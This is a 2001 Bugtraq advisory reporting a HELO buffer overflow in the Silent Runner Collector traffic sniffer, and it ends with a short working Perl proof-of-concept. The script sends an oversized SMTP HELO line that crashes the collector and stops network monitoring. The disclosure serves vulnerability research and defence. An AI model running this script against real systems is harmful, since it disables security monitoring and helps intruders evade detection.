[19929] in bugtraq
Silent Runner Collector - HELO buffer overflow vulnerability
daemon@ATHENA.MIT.EDU (Jack Hayes)
Fri Mar 30 01:09:18 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3AC3DC0B.D3373B@cablespeed.com>
Date: Thu, 29 Mar 2001 20:06:19 -0500
Reply-To: Jack Hayes <jackhayes@CABLESPEED.COM>
From: Jack Hayes <jackhayes@CABLESPEED.COM>
X-To: FOCUS-IDS@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
Hello,
Silent Runner Collector (SRC) has a buffer overflow condition in the
routines
that parse SMTP traffic. SRC is the "sniffer" conponent of the Silent
Runner
network traffic analysis suite. The overflow was noticed in SRC v1.6.1
but is
likely present in other versions as well. The actual buffer in
question holds the
SMTP HELO line. The overflow occurs when a HELO command in excess of
4096 bytes transits a network segment that the collector is monitoring.
This
vulnerability can be exploited by an intruder to crash the collector and
thus stop
the monitoring of transiting network traffic. I'm not sure if this bug
can be
exploited in such a way as to allow for the execution of code on the
sensor.
Maybe someone else has some insight into the possibilities for
arbitrary code
execution?
Jack
#!/usr/bin/perl
# This is a simple script that demonstrates the
# SRC HELO overflow vulnerability. It will result
# in a crashed silent runner collector so please do
# not use it on production networks. It is intended
# for demonstration purposes only.
use IO::Socket;
$remote_host = '192.168.111.3';
$remote_port = 25;
$buf = 'A' x 4092;
$socket = IO::Socket::INET->new(PeerAddr => $remote_host,
PeerPort => $remote_port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Can't connect to $remote_host:$remote_port : $@\n";
# 'HELO ' + $buf = 4097 bytes ( 1 byte too much)
print $socket "HELO $buf";
exit;
